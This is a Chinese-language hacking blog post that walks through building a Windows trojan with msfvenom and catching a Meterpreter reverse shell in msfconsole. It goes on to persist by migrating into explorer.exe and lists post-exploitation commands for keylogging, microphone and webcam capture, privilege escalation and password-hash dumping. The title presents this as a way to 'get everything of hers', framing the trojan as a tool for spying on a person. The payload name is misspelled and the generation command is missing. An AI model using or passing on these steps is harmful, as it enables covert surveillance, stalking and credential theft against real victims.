利用msfvenom制作木马程序（你可以得到她的一切）

Posted 2020-11-18 r-hacker

  实验环境：

虚拟机：kali  （攻击机）　　         192.168.1.2   

虚拟机：windwos 2003 （靶机）   192.168.1.100

 

1. 制作木马

说明： -p payload(有效载荷)

-e  编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

-f exe 生成EXE的格式

 

输入命令之后会在home中生成一个 exe的文件

 

2.

然后在终端输入：msfconsole 

然后 use exploit/multi/handler

然后 set payload windows/meterpreter/reverset_tcp

然后 set LHOST 

然后 set LPORT

在run运行

 

3. 将制作的木马放在 windows server2003 ，运行之后，什么也不显示。但是这个时候你就会发现kali这边就已经上线了。

 

 

 

成功获取最高权限，可以做一切你想做的事。

上线之后，由于你的程序木马单独的存在被攻击电脑中，所以容易被清除，这个时候你需要 注入到被攻击者自带的某个程序中，如桌面程序（explorer.exe） ，利用ps命令 ，找到这个进程并记住这个程序的PID。然后 Migrate （迁移） pid 。

然后就实行以下的一些功能：

run vnc   开启远程桌面

sysinfo  获取电脑信息

reboot  重启电脑

shell 获取shell

shutdown  关闭电脑

enumdesktops      --用户登录数

keyscan_dump　　　键盘记录－下载

keyscan_start　　　键盘记录　－　开始

keyscan_stop 　　　键盘记录　－　停止

Uictl　　　　　　　获取键盘鼠标控制权

record_mic　　　　音频录制 

webcam_chat　　　查看摄像头接口

webcam_list　　　查看摄像头列表

webcam_stream　　摄像头视频获取

Getsystem　　　　获取高权限

Hashdump　　　下载ＨＡＳＨ